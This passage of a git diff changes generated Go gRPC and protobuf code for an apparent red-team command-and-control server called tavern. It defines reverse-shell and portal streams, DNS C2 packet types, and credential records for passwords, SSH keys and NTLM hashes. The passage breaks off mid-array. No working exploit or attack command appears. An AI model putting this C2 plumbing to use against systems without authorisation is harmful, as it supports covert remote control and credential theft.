x.ServerStream.SendMsg(m) +} + +func (x *c2ReverseShellServer) Recv() (*ReverseShellRequest, error) { + m := new(ReverseShellRequest) + if err := x.ServerStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} func _C2_CreatePortal_Handler(srv interface{}, stream grpc.ServerStream) error { - return srv.(C2Server).CreatePortal(&grpc.GenericServerStream[CreatePortalRequest, CreatePortalResponse]{ServerStream: stream}) + return srv.(C2Server).CreatePortal(&c2CreatePortalServer{ServerStream: stream}) } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type C2_CreatePortalServer = grpc.BidiStreamingServer[CreatePortalRequest, CreatePortalResponse] +type C2_CreatePortalServer interface { + Send(*CreatePortalResponse) error + Recv() (*CreatePortalRequest, error) + grpc.ServerStream +} + +type c2CreatePortalServer struct { + grpc.ServerStream +} + +func (x *c2CreatePortalServer) Send(m *CreatePortalResponse) error { + return x.ServerStream.SendMsg(m) +} + +func (x *c2CreatePortalServer) Recv() (*CreatePortalRequest, error) { + m := new(CreatePortalRequest) + if err := x.ServerStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} // C2_ServiceDesc is the grpc.ServiceDesc for C2 service. // It's only intended for direct use with grpc.RegisterService, @@ -382,8 +512,8 @@ var C2_ServiceDesc = grpc.ServiceDesc{ Handler: _C2_ReportProcessList_Handler, }, { - MethodName: "ReportTaskOutput", - Handler: _C2_ReportTaskOutput_Handler, + MethodName: "ReportOutput", + Handler: _C2_ReportOutput_Handler, }, }, Streams: []grpc.StreamDesc{ diff --git a/tavern/internal/c2/dnspb/dns.pb.go b/tavern/internal/c2/dnspb/dns.pb.go index 4edf40db3..a23d32d44 100644 --- a/tavern/internal/c2/dnspb/dns.pb.go +++ b/tavern/internal/c2/dnspb/dns.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go. DO NOT EDIT. // versions: -// protoc-gen-go v1.36.11 -// protoc v4.25.1 +// protoc-gen-go v1.36.5 +// protoc v3.21.12 // source: dns.proto package dnspb @@ -415,46 +415,62 @@ func (x *ResponseMetadata) GetChunkSize() uint32 { var File_dns_proto protoreflect.FileDescriptor -const file_dns_proto_rawDesc = "" + - "\n" + - "\tdns.proto\x12\x03dns\"\xf9\x01\n" + - "\tDNSPacket\x12#\n" + - "\x04type\x18\x01 \x01(\x0e2\x0f.dns.PacketTypeR\x04type\x12\x1a\n" + - "\bsequence\x18\x02 \x01(\rR\bsequence\x12'\n" + - "\x0fconversation_id\x18\x03 \x01(\tR\x0econversationId\x12\x12\n" + - "\x04data\x18\x04 \x01(\fR\x04data\x12\x14\n" + - "\x05crc32\x18\x05 \x01(\rR\x05crc32\x12\x1f\n" + - "\vwindow_size\x18\x06 \x01(\rR\n" + - "windowSize\x12!\n" + - "\x04acks\x18\a \x03(\v2\r.dns.AckRangeR\x04acks\x12\x14\n" + - "\x05nacks\x18\b \x03(\rR\x05nacks\"@\n" + - "\bAckRange\x12\x1b\n" + - "\tstart_seq\x18\x01 \x01(\rR\bstartSeq\x12\x17\n" + - "\aend_seq\x18\x02 \x01(\rR\x06endSeq\"\x8d\x01\n" + - "\vInitPayload\x12\x1f\n" + - "\vmethod_code\x18\x01 \x01(\tR\n" + - "methodCode\x12!\n" + - "\ftotal_chunks\x18\x02 \x01(\rR\vtotalChunks\x12\x1d\n" + - "\n" + - "data_crc32\x18\x03 \x01(\rR\tdataCrc32\x12\x1b\n" + - "\tfile_size\x18\x04 \x01(\rR\bfileSize\"/\n" + - "\fFetchPayload\x12\x1f\n" + - "\vchunk_index\x18\x01 \x01(\rR\n" + - "chunkIndex\"s\n" + - "\x10ResponseMetadata\x12!\n" + - "\ftotal_chunks\x18\x01 \x01(\rR\vtotalChunks\x12\x1d\n" + - "\n" + - "data_crc32\x18\x02 \x01(\rR\tdataCrc32\x12\x1d\n" + - "\n" + - "chunk_size\x18\x03 \x01(\rR\tchunkSize*\x9e\x01\n" + - "\n" + - "PacketType\x12\x1b\n" + - "\x17PACKET_TYPE_UNSPECIFIED\x10\x00\x12\x14\n" + - "\x10PACKET_TYPE_INIT\x10\x01\x12\x14\n" + - "\x10PACKET_TYPE_DATA\x10\x02\x12\x15\n" + - "\x11PACKET_TYPE_FETCH\x10\x03\x12\x16\n" + - "\x12PACKET_TYPE_STATUS\x10\x04\x12\x18\n" + - "\x14PACKET_TYPE_COMPLETE\x10\x05B$Z\"realm.pub/tavern/internal/c2/dnspbb\x06proto3" +var file_dns_proto_rawDesc = string([]byte{ + 0x0a, 0x09, 0x64, 0x6e, 0x73, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x03, 0x64, 0x6e, 0x73, + 0x22, 0xf9, 0x01, 0x0a, 0x09, 0x44, 0x4e, 0x53, 0x50, 0x61, 0x63, 0x6b, 0x65, 0x74, 0x12, 0x23, + 0x0a, 0x04, 0x74, 0x79, 0x70, 0x65, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x0f, 0x2e, 0x64, + 0x6e, 0x73, 0x2e, 0x50, 0x61, 0x63, 0x6b, 0x65, 0x74, 0x54, 0x79, 0x70, 0x65, 0x52, 0x04, 0x74, + 0x79, 0x70, 0x65, 0x12, 0x1a, 0x0a, 0x08, 0x73, 0x65, 0x71, 0x75, 0x65, 0x6e, 0x63, 0x65, 0x18, + 0x02, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x08, 0x73, 0x65, 0x71, 0x75, 0x65, 0x6e, 0x63, 0x65, 0x12, + 0x27, 0x0a, 0x0f, 0x63, 0x6f, 0x6e, 0x76, 0x65, 0x72, 0x73, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x5f, + 0x69, 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0e, 0x63, 0x6f, 0x6e, 0x76, 0x65, 0x72, + 0x73, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x49, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, 0x74, 0x61, + 0x18, 0x04, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x64, 0x61, 0x74, 0x61, 0x12, 0x14, 0x0a, 0x05, + 0x63, 0x72, 0x63, 0x33, 0x32, 0x18, 0x05, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x05, 0x63, 0x72, 0x63, + 0x33, 0x32, 0x12, 0x1f, 0x0a, 0x0b, 0x77, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x5f, 0x73, 0x69, 0x7a, + 0x65, 0x18, 0x06, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x0a, 0x77, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x53, + 0x69, 0x7a, 0x65, 0x12, 0x21, 0x0a, 0x04, 0x61, 0x63, 0x6b, 0x73, 0x18, 0x07, 0x20, 0x03, 0x28, + 0x0b, 0x32, 0x0d, 0x2e, 0x64, 0x6e, 0x73, 0x2e, 0x41, 0x63, 0x6b, 0x52, 0x61, 0x6e, 0x67, 0x65, + 0x52, 0x04, 0x61, 0x63, 0x6b, 0x73, 0x12, 0x14, 0x0a, 0x05, 0x6e, 0x61, 0x63, 0x6b, 0x73, 0x18, + 0x08, 0x20, 0x03, 0x28, 0x0d, 0x52, 0x05, 0x6e, 0x61, 0x63, 0x6b, 0x73, 0x22, 0x40, 0x0a, 0x08, + 0x41, 0x63, 0x6b, 0x52, 0x61, 0x6e, 0x67, 0x65, 0x12, 0x1b, 0x0a, 0x09, 0x73, 0x74, 0x61, 0x72, + 0x74, 0x5f, 0x73, 0x65, 0x71, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x08, 0x73, 0x74, 0x61, + 0x72, 0x74, 0x53, 0x65, 0x71, 0x12, 0x17, 0x0a, 0x07, 0x65, 0x6e, 0x64, 0x5f, 0x73, 0x65, 0x71, + 0x18, 0x02, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x06, 0x65, 0x6e, 0x64, 0x53, 0x65, 0x71, 0x22, 0x8d, + 0x01, 0x0a, 0x0b, 0x49, 0x6e, 0x69, 0x74, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x1f, + 0x0a, 0x0b, 0x6d, 0x65, 0x74, 0x68, 0x6f, 0x64, 0x5f, 0x63, 0x6f, 0x64, 0x65, 0x18, 0x01, 0x20, + 0x01, 0x28, 0x09, 0x52, 0x0a, 0x6d, 0x65, 0x74, 0x68, 0x6f, 0x64, 0x43, 0x6f, 0x64, 0x65, 0x12, + 0x21, 0x0a, 0x0c, 0x74, 0x6f, 0x74, 0x61, 0x6c, 0x5f, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x73, 0x18, + 0x02, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x0b, 0x74, 0x6f, 0x74, 0x61, 0x6c, 0x43, 0x68, 0x75, 0x6e, + 0x6b, 0x73, 0x12, 0x1d, 0x0a, 0x0a, 0x64, 0x61, 0x74, 0x61, 0x5f, 0x63, 0x72, 0x63, 0x33, 0x32, + 0x18, 0x03, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x09, 0x64, 0x61, 0x74, 0x61, 0x43, 0x72, 0x63, 0x33, + 0x32, 0x12, 0x1b, 0x0a, 0x09, 0x66, 0x69, 0x6c, 0x65, 0x5f, 0x73, 0x69, 0x7a, 0x65, 0x18, 0x04, + 0x20, 0x01, 0x28, 0x0d, 0x52, 0x08, 0x66, 0x69, 0x6c, 0x65, 0x53, 0x69, 0x7a, 0x65, 0x22, 0x2f, + 0x0a, 0x0c, 0x46, 0x65, 0x74, 0x63, 0x68, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x1f, + 0x0a, 0x0b, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x5f, 0x69, 0x6e, 0x64, 0x65, 0x78, 0x18, 0x01, 0x20, + 0x01, 0x28, 0x0d, 0x52, 0x0a, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x49, 0x6e, 0x64, 0x65, 0x78, 0x22, + 0x73, 0x0a, 0x10, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x4d, 0x65, 0x74, 0x61, 0x64, + 0x61, 0x74, 0x61, 0x12, 0x21, 0x0a, 0x0c, 0x74, 0x6f, 0x74, 0x61, 0x6c, 0x5f, 0x63, 0x68, 0x75, + 0x6e, 0x6b, 0x73, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x0b, 0x74, 0x6f, 0x74, 0x61, 0x6c, + 0x43, 0x68, 0x75, 0x6e, 0x6b, 0x73, 0x12, 0x1d, 0x0a, 0x0a, 0x64, 0x61, 0x74, 0x61, 0x5f, 0x63, + 0x72, 0x63, 0x33, 0x32, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x09, 0x64, 0x61, 0x74, 0x61, + 0x43, 0x72, 0x63, 0x33, 0x32, 0x12, 0x1d, 0x0a, 0x0a, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x5f, 0x73, + 0x69, 0x7a, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0d, 0x52, 0x09, 0x63, 0x68, 0x75, 0x6e, 0x6b, + 0x53, 0x69, 0x7a, 0x65, 0x2a, 0x9e, 0x01, 0x0a, 0x0a, 0x50, 0x61, 0x63, 0x6b, 0x65, 0x74, 0x54, + 0x79, 0x70, 0x65, 0x12, 0x1b, 0x0a, 0x17, 0x50, 0x41, 0x43, 0x4b, 0x45, 0x54, 0x5f, 0x54, 0x59, + 0x50, 0x45, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, + 0x12, 0x14, 0x0a, 0x10, 0x50, 0x41, 0x43, 0x4b, 0x45, 0x54, 0x5f, 0x54, 0x59, 0x50, 0x45, 0x5f, + 0x49, 0x4e, 0x49, 0x54, 0x10, 0x01, 0x12, 0x14, 0x0a, 0x10, 0x50, 0x41, 0x43, 0x4b, 0x45, 0x54, + 0x5f, 0x54, 0x59, 0x50, 0x45, 0x5f, 0x44, 0x41, 0x54, 0x41, 0x10, 0x02, 0x12, 0x15, 0x0a, 0x11, + 0x50, 0x41, 0x43, 0x4b, 0x45, 0x54, 0x5f, 0x54, 0x59, 0x50, 0x45, 0x5f, 0x46, 0x45, 0x54, 0x43, + 0x48, 0x10, 0x03, 0x12, 0x16, 0x0a, 0x12, 0x50, 0x41, 0x43, 0x4b, 0x45, 0x54, 0x5f, 0x54, 0x59, + 0x50, 0x45, 0x5f, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x10, 0x04, 0x12, 0x18, 0x0a, 0x14, 0x50, + 0x41, 0x43, 0x4b, 0x45, 0x54, 0x5f, 0x54, 0x59, 0x50, 0x45, 0x5f, 0x43, 0x4f, 0x4d, 0x50, 0x4c, + 0x45, 0x54, 0x45, 0x10, 0x05, 0x42, 0x24, 0x5a, 0x22, 0x72, 0x65, 0x61, 0x6c, 0x6d, 0x2e, 0x70, + 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x6e, + 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x64, 0x6e, 0x73, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, + 0x74, 0x6f, 0x33, +}) var ( file_dns_proto_rawDescOnce sync.Once diff --git a/tavern/internal/c2/epb/eldritch.pb.go b/tavern/internal/c2/epb/eldritch.pb.go index 72cb91d7c..3e9a45035 100644 --- a/tavern/internal/c2/epb/eldritch.pb.go +++ b/tavern/internal/c2/epb/eldritch.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go. DO NOT EDIT. // versions: -// protoc-gen-go v1.36.11 -// protoc v4.25.1 +// protoc-gen-go v1.36.5 +// protoc v3.21.12 // source: eldritch.proto package epb @@ -571,68 +571,90 @@ func (x *File) GetChunk() []byte { var File_eldritch_proto protoreflect.FileDescriptor -const file_eldritch_proto_rawDesc = "" + - "\n" + - "\x0eeldritch.proto\x12\beldritch\"\xc0\x01\n" + - "\x04Tome\x12\x1a\n" + - "\beldritch\x18\x01 \x01(\tR\beldritch\x12>\n" + - "\n" + - "parameters\x18\x02 \x03(\v2\x1e.eldritch.Tome.ParametersEntryR\n" + - "parameters\x12\x1d\n" + - "\n" + - "file_names\x18\x03 \x03(\tR\tfileNames\x1a=\n" + - "\x0fParametersEntry\x12\x10\n" + - "\x03key\x18\x01 \x01(\tR\x03key\x12\x14\n" + - "\x05value\x18\x02 \x01(\tR\x05value:\x028\x01\"\xc8\x01\n" + - "\n" + - "Credential\x12\x1c\n" + - "\tprincipal\x18\x01 \x01(\tR\tprincipal\x12\x16\n" + - "\x06secret\x18\x02 \x01(\tR\x06secret\x12-\n" + - "\x04kind\x18\x03 \x01(\x0e2\x19.eldritch.Credential.KindR\x04kind\"U\n" + - "\x04Kind\x12\x14\n" + - "\x10KIND_UNSPECIFIED\x10\x00\x12\x11\n" + - "\rKIND_PASSWORD\x10\x01\x12\x10\n" + - "\fKIND_SSH_KEY\x10\x02\x12\x12\n" + - "\x0eKIND_NTLM_HASH\x10\x03\"\x8b\x04\n" + - "\aProcess\x12\x10\n" + - "\x03pid\x18\x01 \x01(\x04R\x03pid\x12\x12\n" + - "\x04ppid\x18\x02 \x01(\x04R\x04ppid\x12\x12\n" + - "\x04name\x18\x03 \x01(\tR\x04name\x12\x1c\n" + - "\tprincipal\x18\x04 \x01(\tR\tprincipal\x12\x12\n" + - "\x04path\x18\x05 \x01(\tR\x04path\x12\x10\n" + - "\x03cmd\x18\x06 \x01(\tR\x03cmd\x12\x10\n" + - "\x03env\x18\a \x01(\tR\x03env\x12\x10\n" + - "\x03cwd\x18\b \x01(\tR\x03cwd\x120\n" + - "\x06status\x18\t \x01(\x0e2\x18.eldritch.Process.StatusR\x06status\"\xab\x02\n" + - "\x06Status\x12\x16\n" + - "\x12STATUS_UNSPECIFIED\x10\x00\x12\x12\n" + - "\x0eSTATUS_UNKNOWN\x10\x01\x12\x0f\n" + - "\vSTATUS_IDLE\x10\x02\x12\x0e\n" + - "\n" + - "STATUS_RUN\x10\x03\x12\x10\n" + - "\fSTATUS_SLEEP\x10\x04\x12\x0f\n" + - "\vSTATUS_STOP\x10\x05\x12\x11\n" + - "\rSTATUS_ZOMBIE\x10\x06\x12\x12\n" + - "\x0eSTATUS_TRACING\x10\a\x12\x0f\n" + - "\vSTATUS_DEAD\x10\b\x12\x14\n" + - "\x10STATUS_WAKE_KILL\x10\t\x12\x11\n" + - "\rSTATUS_WAKING\x10\n" + - "\x12\x11\n" + - "\rSTATUS_PARKED\x10\v\x12\x17\n" + - "\x13STATUS_LOCK_BLOCKED\x10\f\x12$\n" + - " STATUS_UNINTERUPTIBLE_DISK_SLEEP\x10\r\"4\n" + - "\vProcessList\x12%\n" + - "\x04list\x18\x01 \x03(\v2\x11.eldritch.ProcessR\x04list\"\xa8\x01\n" + - "\fFileMetadata\x12\x12\n" + - "\x04path\x18\x01 \x01(\tR\x04path\x12\x14\n" + - "\x05owner\x18\x02 \x01(\tR\x05owner\x12\x14\n" + - "\x05group\x18\x03 \x01(\tR\x05group\x12 \n" + - "\vpermissions\x18\x04 \x01(\tR\vpermissions\x12\x12\n" + - "\x04size\x18\x05 \x01(\x04R\x04size\x12\"\n" + - "\rsha3_256_hash\x18\x06 \x01(\tR\vsha3256Hash\"P\n" + - "\x04File\x122\n" + - "\bmetadata\x18\x01 \x01(\v2\x16.eldritch.FileMetadataR\bmetadata\x12\x14\n" + - "\x05chunk\x18\x02 \x01(\fR\x05chunkB\"Z realm.pub/tavern/internal/c2/epbb\x06proto3" +var file_eldritch_proto_rawDesc = string([]byte{ + 0x0a, 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, + 0x12, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x22, 0xc0, 0x01, 0x0a, 0x04, 0x54, + 0x6f, 0x6d, 0x65, 0x12, 0x1a, 0x0a, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x18, + 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x12, + 0x3e, 0x0a, 0x0a, 0x70, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x18, 0x02, 0x20, + 0x03, 0x28, 0x0b, 0x32, 0x1e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x54, + 0x6f, 0x6d, 0x65, 0x2e, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x45, 0x6e, + 0x74, 0x72, 0x79, 0x52, 0x0a, 0x70, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x12, + 0x1d, 0x0a, 0x0a, 0x66, 0x69, 0x6c, 0x65, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x73, 0x18, 0x03, 0x20, + 0x03, 0x28, 0x09, 0x52, 0x09, 0x66, 0x69, 0x6c, 0x65, 0x4e, 0x61, 0x6d, 0x65, 0x73, 0x1a, 0x3d, + 0x0a, 0x0f, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x45, 0x6e, 0x74, 0x72, + 0x79, 0x12, 0x10, 0x0a, 0x03, 0x6b, 0x65, 0x79, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, + 0x6b, 0x65, 0x79, 0x12, 0x14, 0x0a, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x3a, 0x02, 0x38, 0x01, 0x22, 0xc8, 0x01, + 0x0a, 0x0a, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x12, 0x1c, 0x0a, 0x09, + 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, 0x12, 0x16, 0x0a, 0x06, 0x73, 0x65, + 0x63, 0x72, 0x65, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x73, 0x65, 0x63, 0x72, + 0x65, 0x74, 0x12, 0x2d, 0x0a, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0e, + 0x32, 0x19, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x43, 0x72, 0x65, 0x64, + 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x2e, 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, + 0x64, 0x22, 0x55, 0x0a, 0x04, 0x4b, 0x69, 0x6e, 0x64, 0x12, 0x14, 0x0a, 0x10, 0x4b, 0x49, 0x4e, + 0x44, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, + 0x11, 0x0a, 0x0d, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, + 0x10, 0x01, 0x12, 0x10, 0x0a, 0x0c, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x53, 0x53, 0x48, 0x5f, 0x4b, + 0x45, 0x59, 0x10, 0x02, 0x12, 0x12, 0x0a, 0x0e, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x4e, 0x54, 0x4c, + 0x4d, 0x5f, 0x48, 0x41, 0x53, 0x48, 0x10, 0x03, 0x22, 0x8b, 0x04, 0x0a, 0x07, 0x50, 0x72, 0x6f, + 0x63, 0x65, 0x73, 0x73, 0x12, 0x10, 0x0a, 0x03, 0x70, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x04, 0x52, 0x03, 0x70, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x70, 0x70, 0x69, 0x64, 0x18, 0x02, + 0x20, 0x01, 0x28, 0x04, 0x52, 0x04, 0x70, 0x70, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, + 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x1c, + 0x0a, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, 0x18, 0x04, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, 0x12, 0x12, 0x0a, 0x04, + 0x70, 0x61, 0x74, 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x70, 0x61, 0x74, 0x68, + 0x12, 0x10, 0x0a, 0x03, 0x63, 0x6d, 0x64, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x63, + 0x6d, 0x64, 0x12, 0x10, 0x0a, 0x03, 0x65, 0x6e, 0x76, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x03, 0x65, 0x6e, 0x76, 0x12, 0x10, 0x0a, 0x03, 0x63, 0x77, 0x64, 0x18, 0x08, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x03, 0x63, 0x77, 0x64, 0x12, 0x30, 0x0a, 0x06, 0x73, 0x74, 0x61, 0x74, 0x75, 0x73, + 0x18, 0x09, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x18, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, + 0x68, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x2e, 0x53, 0x74, 0x61, 0x74, 0x75, 0x73, + 0x52, 0x06, 0x73, 0x74, 0x61, 0x74, 0x75, 0x73, 0x22, 0xab, 0x02, 0x0a, 0x06, 0x53, 0x74, 0x61, + 0x74, 0x75, 0x73, 0x12, 0x16, 0x0a, 0x12, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, + 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x12, 0x0a, 0x0e, 0x53, + 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x4b, 0x4e, 0x4f, 0x57, 0x4e, 0x10, 0x01, 0x12, + 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x49, 0x44, 0x4c, 0x45, 0x10, 0x02, + 0x12, 0x0e, 0x0a, 0x0a, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x52, 0x55, 0x4e, 0x10, 0x03, + 0x12, 0x10, 0x0a, 0x0c, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x53, 0x4c, 0x45, 0x45, 0x50, + 0x10, 0x04, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x53, 0x54, 0x4f, + 0x50, 0x10, 0x05, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x5a, 0x4f, + 0x4d, 0x42, 0x49, 0x45, 0x10, 0x06, 0x12, 0x12, 0x0a, 0x0e, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, + 0x5f, 0x54, 0x52, 0x41, 0x43, 0x49, 0x4e, 0x47, 0x10, 0x07, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, + 0x41, 0x54, 0x55, 0x53, 0x5f, 0x44, 0x45, 0x41, 0x44, 0x10, 0x08, 0x12, 0x14, 0x0a, 0x10, 0x53, + 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x57, 0x41, 0x4b, 0x45, 0x5f, 0x4b, 0x49, 0x4c, 0x4c, 0x10, + 0x09, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x57, 0x41, 0x4b, 0x49, + 0x4e, 0x47, 0x10, 0x0a, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x50, + 0x41, 0x52, 0x4b, 0x45, 0x44, 0x10, 0x0b, 0x12, 0x17, 0x0a, 0x13, 0x53, 0x54, 0x41, 0x54, 0x55, + 0x53, 0x5f, 0x4c, 0x4f, 0x43, 0x4b, 0x5f, 0x42, 0x4c, 0x4f, 0x43, 0x4b, 0x45, 0x44, 0x10, 0x0c, + 0x12, 0x24, 0x0a, 0x20, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x49, 0x4e, 0x54, + 0x45, 0x52, 0x55, 0x50, 0x54, 0x49, 0x42, 0x4c, 0x45, 0x5f, 0x44, 0x49, 0x53, 0x4b, 0x5f, 0x53, + 0x4c, 0x45, 0x45, 0x50, 0x10, 0x0d, 0x22, 0x34, 0x0a, 0x0b, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, + 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x25, 0x0a, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x18, 0x01, 0x20, + 0x03, 0x28, 0x0b, 0x32, 0x11, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x50, + 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x22, 0xa8, 0x01, 0x0a, + 0x0c, 0x46, 0x69, 0x6c, 0x65, 0x4d, 0x65, 0x74, 0x61, 0x64, 0x61, 0x74, 0x61, 0x12, 0x12, 0x0a, + 0x04, 0x70, 0x61, 0x74, 0x68, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x70, 0x61, 0x74, + 0x68, 0x12, 0x14, 0x0a, 0x05, 0x6f, 0x77, 0x6e, 0x65, 0x72, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, + 0x52, 0x05, 0x6f, 0x77, 0x6e, 0x65, 0x72, 0x12, 0x14, 0x0a, 0x05, 0x67, 0x72, 0x6f, 0x75, 0x70, + 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x12, 0x20, 0x0a, + 0x0b, 0x70, 0x65, 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x18, 0x04, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x0b, 0x70, 0x65, 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, + 0x12, 0x0a, 0x04, 0x73, 0x69, 0x7a, 0x65, 0x18, 